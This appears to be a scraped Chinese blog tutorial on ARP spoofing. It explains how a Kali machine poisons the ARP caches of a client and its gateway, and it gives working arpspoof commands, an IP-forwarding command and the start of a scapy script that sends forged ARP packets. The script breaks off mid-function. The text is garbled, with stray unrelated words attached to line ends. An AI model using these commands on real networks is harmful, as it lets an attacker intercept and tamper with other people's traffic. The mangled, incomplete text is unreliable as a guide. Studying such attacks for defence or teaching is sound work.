協議包分析python
ARP原理:緩存
在PC1 訪問 Server 的流量 要通過網關 也就是 192.168.1.254blog
欺騙原理:pc1 與 網關 創建 MAC ARP 緩存ip
咱們將KALI 攻擊機的 MAC 發給 pc 1 告訴 此時 ARP關係 與KALI 進行創建 import
arpspoof - i eth0 -t 192.168.1.254 192.168.1.1 把本身的MAC 發給 192.168.1.1 以網關的身份發過去 -- 192.168.1.254 - 192.168.1.1 這裏會更改 用戶的 MAC ARP緩存 原理
arpspoof - i eth0 -t 192.168.1.1 192.168.1.254 把本身的MAC 發給 192.168.1.254 以用戶的身份發過去 告訴網關 咱們纔是用戶 -- 192.168.1.1 - 192.168.1.254 這裏會更改 網關的MAC ARP緩存psr
這樣 192.168.1.1 請求的 結果 就會返回給 KALI KALI 再發給 網關請求
網關獲得的結果 發給客戶端 也會返回KALI KALI 再發給客戶端im
在kali 下操做 須要 echo 1 > /proc/sys/net/ipv4/ip_forward客戶端
腳本編寫:
利用python
scapy 模塊
包:pkt=Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip1,psrc=ip2)
sendp(pkt)
import sys
import time
from scapy.all import *
def arp_spoof(ip1,ip2):
try:
pkt=Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip1,psrc=ip2)
sendp(pkt)
except: